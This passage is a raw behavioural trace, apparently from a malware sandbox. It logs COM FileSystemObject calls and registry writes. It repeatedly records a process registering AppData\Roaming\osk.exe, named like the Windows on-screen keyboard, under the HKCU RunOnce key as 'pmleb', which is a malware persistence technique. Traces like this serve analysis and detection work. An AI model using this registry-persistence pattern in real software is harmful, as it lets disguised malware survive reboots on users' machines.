Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.312] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.312] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.312] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.312] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6c [0082.312] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.312] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6d [0082.313] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), 
pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.313] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6c [0082.313] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.313] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.313] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.313] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.314] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.314] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.314] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.314] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.314] WideCharToMultiByte (in: 
CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.314] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.314] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.314] RegCloseKey (hKey=0x280) returned 0x0 [0082.314] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.314] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.314] SetTimer (hWnd=0x20280, nIDEvent=0x20e8, uElapse=0xa, lpTimerFunc=0x0) returned 0x20e8 [0082.314] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.327] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.327] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.327] KillTimer (hWnd=0x20280, uIDEvent=0x20e8) returned 1 [0082.327] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.327] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.327] IUnknown:Release (This=0x787518) returned 0x1 [0082.327] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, 
riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.327] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.328] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.328] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.328] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.328] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: 
ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.328] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.328] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.328] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.328] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6d [0082.328] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.328] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6e [0082.328] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.329] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6d [0082.329] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.329] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.329] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.329] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.330] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.330] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.330] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.330] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", 
cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.330] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.330] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.330] RegCloseKey (hKey=0x280) returned 0x0 [0082.330] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.330] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.330] SetTimer (hWnd=0x20280, nIDEvent=0x20e9, uElapse=0xa, lpTimerFunc=0x0) returned 0x20e9 [0082.330] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.342] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.342] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.342] KillTimer (hWnd=0x20280, uIDEvent=0x20e9) returned 1 [0082.343] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.343] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.343] IUnknown:Release (This=0x787518) returned 0x1 [0082.343] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 
[7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.343] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.343] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.343] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.343] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.343] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.343] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, 
riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.343] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.344] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.344] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6e [0082.344] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.344] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6f [0082.344] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), 
pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.345] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6e [0082.345] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.345] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.345] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.345] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.345] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.345] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.345] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.345] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 
lpUsedDefaultChar=0x0) returned 54 [0082.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.345] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.345] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.345] RegCloseKey (hKey=0x280) returned 0x0 [0082.346] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.346] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.346] SetTimer (hWnd=0x20280, nIDEvent=0x20ea, uElapse=0xa, lpTimerFunc=0x0) returned 0x20ea [0082.346] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.358] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.358] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.358] KillTimer (hWnd=0x20280, uIDEvent=0x20ea) returned 1 [0082.359] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.359] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.359] IUnknown:Release (This=0x787518) returned 0x1 [0082.359] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) 
returned 0x0 [0082.359] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.359] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.359] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 